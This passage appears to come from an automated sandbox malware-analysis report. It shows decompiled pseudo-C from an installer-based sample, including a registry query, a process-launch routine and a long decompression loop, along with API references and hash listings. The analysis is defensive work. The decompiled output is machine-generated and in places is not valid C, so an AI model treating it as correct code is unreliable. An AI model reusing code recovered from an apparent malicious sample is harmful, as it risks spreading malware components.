					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00405f8e
0x00405f90
0x00405fa8
0x00405fad
0x00405fb2
0x00405fef
0x00405fef
0x00405fb4
0x00405fc6
0x00405fd1
0x00405fd7
0x00405fe1
0x00000000
0x00000000
0x00405fe1
0x00405ff4

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,004061C4,80000002), ref: 00405FC6
RegCloseKey.KERNELBASE(?,?,004061C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll), ref: 00405FD1

Strings

Call, xrefs: 00405F83, 00405FB7

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 89fd80a38215459d753601d22b2c149a63a94ab0799c11bc238657d83ab6ff10
Instruction ID: 18c902175c261954d743b78889848fcc164f2ce977d73a6ea322bbd2e465ffc2
Opcode Fuzzy Hash: 89fd80a38215459d753601d22b2c149a63a94ab0799c11bc238657d83ab6ff10
Instruction Fuzzy Hash: CD01BC7250020AABDF228F20CC09FDB3FA8EF54364F00403AFA05A2190D278CA14DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405738 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405738(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422538->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x422538,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405741
0x00405761
0x00405769
0x0040576e
0x00000000
0x00405774
0x00405778

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422538,Error launching installer), ref: 00405761
CloseHandle.KERNEL32(?), ref: 0040576E

Strings

Error launching installer, xrefs: 0040574B

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
Instruction ID: 69b2a91025ee82e0f17d0b644fa8ba69f8cb79a6280e59e5c1840fb2568b3eab
Opcode Fuzzy Hash: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
Instruction Fuzzy Hash: 00E046F0600209BFEB009F60EE49F7BBBACEB10704F808421BD00F2190D6B898448A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406B5A Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406B5A() {
				signed int _t492;
				void _t499;
				signed int _t500;
				signed int _t501;
				unsigned short _t531;
				signed int _t541;
				signed int _t569;
				void* _t589;
				signed int _t590;
				signed int _t597;
				signed int* _t605;
				void* _t606;

				_t492 =  *(_t606 - 0x30);
				if(_t492 >= 4) {
				}
				 *(_t606 - 0x40) = 6;
				 *(_t606 - 0x7c) = 0x19;
				 *((intOrPtr*)(_t606 - 0x58)) = (_t492 << 7) +  *(_t606 - 4) + 0x360;
				 *(_t606 - 0x50) = 1;
				 *(_t606 - 0x48) =  *(_t606 - 0x40);
				while(1) {
					if( *(_t606 - 0x48) <= 0) {
						break;
					}
					_t589 =  *(_t606 - 0x50) +  *(_t606 - 0x50);
					_t605 = _t589 +  *((intOrPtr*)(_t606 - 0x58));
					 *(_t606 - 0x54) = _t605;
					_t531 =  *_t605;
					_t597 = _t531 & 0x0000ffff;
					_t569 = ( *(_t606 - 0x10) >> 0xb) * _t597;
					if( *(_t606 - 0xc) >= _t569) {
						 *(_t606 - 0x10) =  *(_t606 - 0x10) - _t569;
						 *(_t606 - 0xc) =  *(_t606 - 0xc) - _t569;
						_t590 = _t589 + 1;
						 *_t605 = _t531 - (_t531 >> 5);
						 *(_t606 - 0x50) = _t590;
					} else {
						 *(_t606 - 0x10) = _t569;
						 *(_t606 - 0x50) =  *(_t606 - 0x50) << 1;
						 *_t605 = (0x800 - _t597 >> 5) + _t531;
					}
					if( *(_t606 - 0x10) >= 0x1000000) {
						L132:
						_t452 = _t606 - 0x48;
						 *_t452 =  *(_t606 - 0x48) - 1;
						continue;
					} else {
						if( *(_t606 - 0x6c) == 0) {
							 *(_t606 - 0x88) = 0x18;
							L153:
							_t541 = 0x22;
							memcpy( *(_t606 - 0x90), _t606 - 0x88, _t541 << 2);
							_t501 = 0;
						} else {
							 *(_t606 - 0x10) =  *(_t606 - 0x10) << 8;
							 *(_t606 - 0x6c) =  *(_t606 - 0x6c) - 1;
							_t449 = _t606 - 0x70;
							 *_t449 =  &(( *(_t606 - 0x70))[1]);
							 *(_t606 - 0xc) =  *(_t606 - 0xc) << 0x00000008 |  *( *(_t606 - 0x70)) & 0x000000ff;
							goto L132;
						}
					}
					L155:
					return _t501;
				}
				_t499 =  *(_t606 - 0x7c);
				 *((intOrPtr*)(_t606 - 0x44)) =  *(_t606 - 0x50) - (1 <<  *(_t606 - 0x40));
				while(1) {
					L128:
					 *(_t606 - 0x88) = _t499;
					while(1) {
						L1:
						_t500 =  *(_t606 - 0x88);
						if(_t500 > 0x1c) {
							break;
						}
						switch( *((intOrPtr*)(_t500 * 4 +  &M00406FC8))) {
							case 0:
								if( *(_t606 - 0x6c) == 0) {
									goto L153;
								} else {
									 *(_t606 - 0x6c) =  *(_t606 - 0x6c) - 1;
									 *(_t606 - 0x70) =  &(( *(_t606 - 0x70))[1]);
									_t500 =  *( *(_t606 - 0x70));
									if(_t500 > 0xe1) {
										goto L154;
									} else {
										_t504 = _t500 & 0x000000ff;
										_push(0x2d);
										asm("cdq");
										_pop(_t543);
										_push(9);
										_pop(_t544);
										_t600 = _t504 / _t543;
										_t506 = _t504 % _t543 & 0x000000ff;
										asm("cdq");
										_t595 = _t506 % _t544 & 0x000000ff;
										 *(_t606 - 0x3c) = _t595;
										 *(_t606 - 0x1c) = (1 << _t600) - 1;
										 *((intOrPtr*)(_t606 - 0x18)) = (1 << _t506 / _t544) - 1;
										_t603 = (0x300 << _t595 + _t600) + 0x736;
										if(0x600 ==  *((intOrPtr*)(_t606 - 0x78))) {
											L10:
											if(_t603 != 0) {
												do {
													_t603 = _t603 - 1;
													 *((short*)( *(_t606 - 4) + _t603 * 2)) = 0x400;
												} while (_t603 != 0);
											}
											 *(_t606 - 0x48) =  *(_t606 - 0x48) & 0x00000000;
											 *(_t606 - 0x40) =  *(_t606 - 0x40) & 0x00000000;
											goto L15;
										} else {
											if( *(_t606 - 4) != 0) {
												GlobalFree( *(_t606 - 4));
											}
											_t500 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t606 - 4) = _t500;
											if(_t500 == 0) {
												goto L154;
											} else {
												 *((intOrPtr*)(_t606 - 0x78)) = 0x600;
												goto L10;
											}
										}
									}
								}
								goto L155;
							case 1:
								L13:
								__eflags =  *(_t606 - 0x6c);
								if( *(_t606 - 0x6c) == 0) {
									 *(_t606 - 0x88) = 1;
									goto L153;
								} else {
									 *(_t606 - 0x6c) =  *(_t606 - 0x6c) - 1;
									 *(_t606 - 0x40) =  *(_t606 - 0x40) | ( *( *(_t606 - 0x70)) & 0x000000ff) <<  *(_t606 - 0x48) << 0x00000003;
									 *(_t606 - 0x70) =  &(( *(_t606 - 0x70))[1]);
									_t45 = _t606 - 0x48;
									 *_t45 =  *(_t606 - 0x48) + 1;
									__eflags =  *_t45;
									L15:
									if( *(_t606 - 0x48) < 4) {
										goto L13;
									} else {
										_t512 =  *(_t606 - 0x40);
										if(_t512 ==  *(_t606 - 0x74)) {
											L20:
											 *(_t606 - 0x48) = 5;
											 *( *(_t606 - 8) +  *(_t606 - 0x74) - 1) =  *( *(_t606 - 8) +  *(_t606 - 0x74) - 1) & 0x00000000;
											goto L23;
										} else {
											 *(_t606 - 0x74) = _t512;
											if( *(_t606 - 8) != 0) {
												GlobalFree( *(_t606 - 8));
											}
											_t500 = GlobalAlloc(0x40,  *(_t606 - 0x40)); // executed
											 *(_t606 - 8) = _t500;
											if(_t500 == 0) {
												goto L154;
											} else {
												goto L20;
											}
										}
									}
								}
								goto L155;
							case 2:
								L24:
								_t519 =  *(_t606 - 0x60) &  *(_t606 - 0x1c);
								 *(_t606 - 0x84) = 6;
								 *(_t606 - 0x4c) = _t519;
								_t604 =  *(_t606 - 4) + (( *(_t606 - 0x38) << 4) + _t519) * 2;
								goto L120;
							case 3:
								L21:
								__eflags =  *(_t606 - 0x6c);
								if( *(_t606 - 0x6c) == 0) {
									 *(_t606 - 0x88) = 3;
									goto L153;
								} else {
									 *(_t606 - 0x6c) =  *(_t606 - 0x6c) - 1;
									_t67 = _t606 - 0x70;
									 *_t67 =  &(( *(_t606 - 0x70))[1]);
									__eflags =  *_t67;
									 *(_t606 - 0xc) =  *(_t606 - 0xc) << 0x00000008 |  *( *(_t606 - 0x70)) & 0x000000ff;
									L23:
									 *(_t606 - 0x48) =  *(_t606 - 0x48) - 1;
									if( *(_t606 - 0x48) != 0) {
										goto L21;
									} else {
										goto L24;
									}
								}
								goto L155;
							case 4:
								L121:
								_t521 =  *_t604;
								_t588 = _t521 & 0x0000ffff;
								_t558 = ( *(_t606 - 0x10) >> 0xb) * _t588;
								if( *(_t606 - 0xc) >= _t558) {
									 *(_t606 - 0x10) =  *(_t606 - 0x10) - _t558;
									 *(_t606 - 0xc) =  *(_t606 - 0xc) - _t558;
									 *(_t606 - 0x40) = 1;
									_t522 = _t521 - (_t521 >> 5);
									__eflags = _t522;
									 *_t604 = _t522;
								} else {
									 *(_t606 - 0x10) = _t558;
									 *(_t606 - 0x40) =  *(_t606 - 0x40) & 0x00000000;
									 *_t604 = (0x800 - _t588 >> 5) + _t521;
								}
								if( *(_t606 - 0x10) >= 0x1000000) {
									goto L127;
								} else {
									goto L125;
								}
								goto L155;
							case 5:
								L125:
								if( *(_t606 - 0x6c) == 0) {
									 *(_t606 - 0x88) = 5;
									goto L153;
								} else {
									 *(_t606 - 0x10) =  *(_t606 - 0x10) << 8;
									 *(_t606 - 0x6c) =  *(_t606 - 0x6c) - 1;
									 *(_t606 - 0x70) =  &(( *(_t606 - 0x70))[1]);
									 *(_t606 - 0xc) =  *(_t606 - 0xc) << 0x00000008 |  *( *(_t606 - 0x70)) & 0x000000ff;
									L127:
									_t499 =  *(_t606 - 0x84);
									goto L128;
								}
								goto L155;
							case 6:
								__edx = 0;
								__eflags =  *(__ebp - 0x40);
								if( *(__ebp - 0x40) != 0) {
									__eax =  *(__ebp - 4);
									__ecx =  *(__ebp - 0x38);
									 *(__ebp - 0x34) = 1;
									 *((intOrPtr*)(__ebp - 0x84)) = 7;
									__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
									goto L120;
								} else {
									__eax =  *(__ebp - 0x5c) & 0x000000ff;
									__esi =  *(__ebp - 0x60);
									__cl = 8;
									__cl = 8 -  *(__ebp - 0x3c);
									__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
									__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
									__ecx =  *(__ebp - 0x3c);
									__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
									__ecx =  *(__ebp - 4);
									(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
									__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
									__eflags =  *(__ebp - 0x38) - 4;
									__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
									 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
									if( *(__ebp - 0x38) >= 4) {
										__eflags =  *(__ebp - 0x38) - 0xa;
										if( *(__ebp - 0x38) >= 0xa) {
											_t98 = __ebp - 0x38;
											 *_t98 =  *(__ebp - 0x38) - 6;
											__eflags =  *_t98;
										} else {
											 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
										}
									} else {
										 *(__ebp - 0x38) = 0;
									}
									__eflags =  *(__ebp - 0x34) - __edx;
									if( *(__ebp - 0x34) == __edx) {
										__ebx = 0;
										__ebx = 1;
										do {
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L59;
											} else {
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *((intOrPtr*)(__ebp - 0x88)) = 0xf;
													goto L153;
												} else {
													__ecx =  *(__ebp - 0x70);
													__eax =  *(__ebp - 0xc);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
													__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
													 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
													 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													_t203 = __ebp - 0x70;
													 *_t203 =  *(__ebp - 0x70) + 1;
													__eflags =  *_t203;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													goto L59;
												}
											}
											goto L155;
											L59:
											__eflags = __ebx - 0x100;
										} while (__ebx < 0x100);
										goto L55;
									} else {
										__eax =  *(__ebp - 0x14);
										__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
										__eflags = __eax -  *(__ebp - 0x74);
										if(__eax >=  *(__ebp - 0x74)) {
											__eax = __eax +  *(__ebp - 0x74);
											__eflags = __eax;
										}
										__ecx =  *(__ebp - 8);
										__ebx = 0;
										__ebx = 1;
										__al =  *((intOrPtr*)(__eax + __ecx));
										 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
										goto L41;
									}
								}
								goto L155;
							case 7:
								__eflags =  *(__ebp - 0x40) - 1;
								if( *(__ebp - 0x40) != 1) {
									__eax =  *(__ebp - 0x24);
									 *((intOrPtr*)(__ebp - 0x80)) = 0x16;
									 *(__ebp - 0x20) =  *(__ebp - 0x24);
									__eax =  *(__ebp - 0x28);
									 *(__ebp - 0x24) =  *(__ebp - 0x28);
									__eax =  *(__ebp - 0x2c);
									 *(__ebp - 0x28) =  *(__ebp - 0x2c);
									__eax = 0;
									__eflags =  *(__ebp - 0x38) - 7;
									0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
									__al = __al & 0x000000fd;
									__eax = (__eflags >= 0) - 1 + 0xa;
									 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x664;
									__eflags = __eax;
									 *(__ebp - 0x58) = __eax;
									goto L68;
								} else {
									__eax =  *(__ebp - 4);
									__ecx =  *(__ebp - 0x38);
									 *((intOrPtr*)(__ebp - 0x84)) = 8;
									__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
								}
								goto L120;
							case 8:
								__eflags =  *(__ebp - 0x40);
								if( *(__ebp - 0x40) != 0) {
									__eax =  *(__ebp - 4);
									__ecx =  *(__ebp - 0x38);
									 *((intOrPtr*)(__ebp - 0x84)) = 0xa;
									__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
								} else {
									__eax =  *(__ebp - 0x38);
									__ecx =  *(__ebp - 4);
									__eax =  *(__ebp - 0x38) + 0xf;
									 *((intOrPtr*)(__ebp - 0x84)) = 9;
									 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *((intOrPtr*)(__ebp - 0x4c));
									__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *((intOrPtr*)(__ebp - 0x4c))) * 2;
								}
								goto L120;
							case 9:
								__eflags =  *(__ebp - 0x40);
								if( *(__ebp - 0x40) != 0) {
									goto L88;
								} else {
									__eflags =  *(__ebp - 0x60);
									if( *(__ebp - 0x60) == 0) {
										goto L154;
									} else {
										__eax = 0;
										__eflags =  *(__ebp - 0x38) - 7;
										0 |  *(__ebp - 0x38) - 0x00000007 >= 0x00000000 = ( *(__ebp - 0x38) - 7 >= 0) + ( *(__ebp - 0x38) - 7 >= 0) + 9;
										 *(__ebp - 0x38) = ( *(__ebp - 0x38) - 7 >= 0) + ( *(__ebp - 0x38) - 7 >= 0) + 9;
										__eflags =  *(__ebp - 0x64);
										if( *(__ebp - 0x64) == 0) {
											 *((intOrPtr*)(__ebp - 0x88)) = 0x1b;
											goto L153;
										} else {
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											goto L78;
										}
									}
								}
								goto L155;
							case 0xa:
								__eflags =  *(__ebp - 0x40);
								if( *(__ebp - 0x40) != 0) {
									__eax =  *(__ebp - 4);
									__ecx =  *(__ebp - 0x38);
									 *((intOrPtr*)(__ebp - 0x84)) = 0xb;
									__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								} else {
									__eax =  *(__ebp - 0x28);
									goto L87;
								}
								goto L120;
							case 0xb:
								__eflags =  *(__ebp - 0x40);
								if( *(__ebp - 0x40) != 0) {
									__ecx =  *(__ebp - 0x24);
									__eax =  *(__ebp - 0x20);
									 *(__ebp - 0x20) =  *(__ebp - 0x24);
								} else {
									__eax =  *(__ebp - 0x24);
								}
								__ecx =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								L87:
								__ecx =  *(__ebp - 0x2c);
								 *(__ebp - 0x2c) = __eax;
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								L88:
								__eax =  *(__ebp - 4);
								 *((intOrPtr*)(__ebp - 0x80)) = 0x15;
								__eax =  *(__ebp - 4) + 0xa68;
								 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
								L68:
								__esi =  *(__ebp - 0x58);
								 *((intOrPtr*)(__ebp - 0x84)) = 0x12;
								L120:
								 *(_t606 - 0x54) = _t604;
								goto L121;
							case 0xc:
								while(1) {
									L91:
									__eflags =  *(__ebp - 0x6c);
									if( *(__ebp - 0x6c) == 0) {
										break;
									}
									__ecx =  *(__ebp - 0x70);
									__eax =  *(__ebp - 0xc);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
									__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
									 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
									 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
									_t322 = __ebp - 0x70;
									 *_t322 =  *(__ebp - 0x70) + 1;
									__eflags =  *_t322;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
									__eax =  *(__ebp - 0x2c);
									while(1) {
										_t326 = __ebp - 0x48;
										 *_t326 =  *(__ebp - 0x48) - 1;
										__eflags =  *_t326;
										__eflags =  *(__ebp - 0x48);
										if( *(__ebp - 0x48) <= 0) {
											break;
										}
										__ecx =  *(__ebp - 0xc);
										__ebx = __ebx + __ebx;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
										__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
											__ecx =  *(__ebp - 0x10);
											 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
											__ebx = __ebx | 0x00000001;
											__eflags = __ebx;
											 *(__ebp - 0x44) = __ebx;
										}
										__eflags =  *(__ebp - 0x10) - 0x1000000;
										if( *(__ebp - 0x10) >= 0x1000000) {
											continue;
										} else {
											goto L91;
										}
										goto L155;
									}
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									while(1) {
										__eax =  *(__ebp - 0x40);
										__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
										if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
											break;
										}
										__eax =  *(__ebp - 0x50);
										 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
										__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
										__eax =  *(__ebp - 0x58);
										__esi = __edi + __eax;
										 *(__ebp - 0x54) = __esi;
										__ax =  *__esi;
										__ecx = __ax & 0x0000ffff;
										__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
										__eflags =  *(__ebp - 0xc) - __edx;
										if( *(__ebp - 0xc) >= __edx) {
											__ecx = 0;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
											__ecx = 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
											__ebx = 1;
											__ecx =  *(__ebp - 0x48);
											__ebx = 1 << __cl;
											__ecx = 1 << __cl;
											__ebx =  *(__ebp - 0x44);
											__ebx =  *(__ebp - 0x44) | __ecx;
											__cx = __ax;
											__cx = __ax >> 5;
											__eax = __eax - __ecx;
											__edi = __edi + 1;
											__eflags = __edi;
											 *(__ebp - 0x44) = __ebx;
											 *__esi = __ax;
											 *(__ebp - 0x50) = __edi;
										} else {
											 *(__ebp - 0x10) = __edx;
											0x800 = 0x800 - __ecx;
											0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
											 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
											 *__esi = __dx;
										}
										__eflags =  *(__ebp - 0x10) - 0x1000000;
										if( *(__ebp - 0x10) >= 0x1000000) {
											L103:
											_t356 = __ebp - 0x48;
											 *_t356 =  *(__ebp - 0x48) + 1;
											__eflags =  *_t356;
											continue;
										} else {
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *((intOrPtr*)(__ebp - 0x88)) = 0x10;
												goto L153;
											} else {
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t353 = __ebp - 0x70;
												 *_t353 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t353;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L103;
											}
										}
										goto L155;
									}
									_t379 = __ebp - 0x2c;
									 *_t379 =  *(__ebp - 0x2c) + __ebx;
									__eflags =  *_t379;
									_t381 = __ebp - 0x2c;
									 *_t381 =  *(__ebp - 0x2c) + 1;
									__eflags =  *_t381;
									__eax =  *(__ebp - 0x2c);
									__eflags = __eax;
									if(__eax == 0) {
										 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
										goto L153;
									} else {
										__eflags = __eax -  *(__ebp - 0x60);
										if(__eax >  *(__ebp - 0x60)) {
											goto L154;
										} else {
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
											__eax =  *(__ebp - 0x30);
											_t388 = __ebp - 0x60;
											 *_t388 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
											__eflags =  *_t388;
											while(1) {
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t402 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t402;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t402;
